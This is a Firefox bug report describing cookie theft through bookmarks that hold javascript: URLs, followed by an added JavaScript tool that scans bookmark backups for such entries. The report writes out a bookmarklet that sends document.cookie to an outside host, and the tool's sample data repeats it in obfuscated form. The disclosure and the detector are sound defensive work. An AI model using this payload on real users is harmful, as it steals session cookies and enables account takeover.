UXSS Bookmark Cookie Stealing
Categories
(Firefox :: Bookmarks & History, defect)
Tracking
| Tracking | Status | |
|---|---|---|
| firefox99 | --- | affected |
People
(Reporter: annubiis, Unassigned)
Attachments
(2 files)
Author: Omar Salazar (a.k.a. Taurus Omar)
Twitter: taurusomar_
Bug Bounty Hunter
Description:
The vulnerability allows a malicious payload to be added to the URL section of the bookmark that is executed anywhere in the browser by bypassing restrictions on Firefox script execution.
Vulnerability Class:
Universal Cross-Site Scripting
Severity Level
High
Exploitation Technique:
Local/Remote
Type:
The vulnerability in question is a UXSS: an attacker can add a malicious payload to a bookmark to steal session cookies from any site or redirect you to a fake phishing page.
Attack Vectors:
1.) This would apply if the user bookmarked a contaminated page.
2.) A malicious person takes the device and adds the malicious bookmark.
3.) An Internet cafe with malicious bookmarks, stealing session cookies from customers.
4.) A malicious technical service adding the bookmark with the payload.
Payload UXSS
javascript:alert("UXSS")
UXSS Cookie Stealing
javascript:document.location='https://cors.ur0.me/?c='+escape(document.cookie);
Attached: 2 videos of the attacks
uxss.mp4
cookieStealing.pm4
Attached: 1 image of the attacks
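Editor's note, added example (not part of the reporter's submission and not Mozilla code): a javascript: URL stored in a bookmark is a bookmarklet, and a bookmarklet runs in the origin of whichever tab is open when it is clicked, which is exactly why the payloads above can read document.cookie for any site. The practical check for the attack vectors listed (shared machine, internet cafe, repair shop) is therefore to audit the bookmark store for the javascript: scheme. The script below walks a Firefox JSON bookmark backup (the `type` / `uri` / `children` shape of Firefox's bookmark export; the sample tree is hand-constructed here, not a real export) and flags every bookmark whose scheme normalises to javascript. Scheme matching is done after stripping leading/trailing controls and embedded tab/newline characters and lower-casing, because URL parsers tolerate those and a naive `startsWith("javascript:")` would miss a lightly obfuscated entry; that normalisation is the author's assumption about how such entries could be disguised, not a claim about the report's own payloads.

```javascript
// Added example: audit a Firefox JSON bookmark backup for bookmarklets
// (bookmarks whose URI uses the javascript: scheme). The tree below is a
// constructed sample that follows the Firefox export shape; the two
// javascript: entries mirror the payloads from the report.
const CONSTRUCTED_BACKUP = {
  guid: "root________",
  title: "",
  type: "text/x-moz-place-container",
  children: [
    {
      guid: "toolbar_____",
      title: "Bookmarks Toolbar",
      type: "text/x-moz-place-container",
      children: [
        { guid: "a1", title: "Mozilla", type: "text/x-moz-place",
          uri: "https://www.mozilla.org/" },
        { guid: "a2", title: "UXSS", type: "text/x-moz-place",
          uri: "javascript:alert(\"UXSS\")" },
        // Mixed case plus an embedded tab and leading spaces: URL parsers
        // strip these, so the scheme is still javascript when clicked.
        { guid: "a3", title: "Cookie stealer", type: "text/x-moz-place",
          uri: "  Java\tScript:document.location='https://cors.ur0.me/?c='+escape(document.cookie);" },
      ],
    },
    // Control entry: a non-javascript scheme that must not be flagged.
    { guid: "a4", title: "Data URL", type: "text/x-moz-place",
      uri: "data:text/plain,hello" },
  ],
};

// Normalise a URI before scheme detection: drop leading/trailing C0
// controls and spaces, remove ASCII tab/newline/CR anywhere, and return
// the lower-cased scheme ("" if the string has no colon at all).
function normaliseScheme(uri) {
  const stripped = uri
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, "")
    .replace(/[\t\n\r]/g, "");
  const colon = stripped.indexOf(":");
  if (colon < 0) return "";
  return stripped.slice(0, colon).toLowerCase();
}

// Depth-first walk of the export tree. Returns one record per bookmark
// whose normalised scheme is javascript, with its folder path for triage.
function findScriptBookmarks(node, flagged = [], path = []) {
  const here = [...path, node.title || "(untitled)"];
  if (node.type === "text/x-moz-place" && typeof node.uri === "string") {
    if (normaliseScheme(node.uri) === "javascript") {
      flagged.push({ guid: node.guid, path: here.join(" / "), uri: node.uri });
    }
  }
  for (const child of node.children || []) {
    findScriptBookmarks(child, flagged, here);
  }
  return flagged;
}

// Human-readable summary, one line per finding.
function report(backup) {
  const found = findScriptBookmarks(backup);
  if (found.length === 0) return "no javascript: bookmarks found";
  return found
    .map((f) => `${f.guid}\t${f.path}\t${f.uri.trim().slice(0, 60)}`)
    .join("\n");
}

console.log(report(CONSTRUCTED_BACKUP));
```

To run this against a real profile, export bookmarks with Library > Import and Backup > Backup... (or read the compressed backups under the profile's bookmarkbackups/ directory) and pass the parsed JSON to `findScriptBookmarks`; any hit on a machine the user does not control should be treated as the "malicious bookmark" scenario from the attack-vector list.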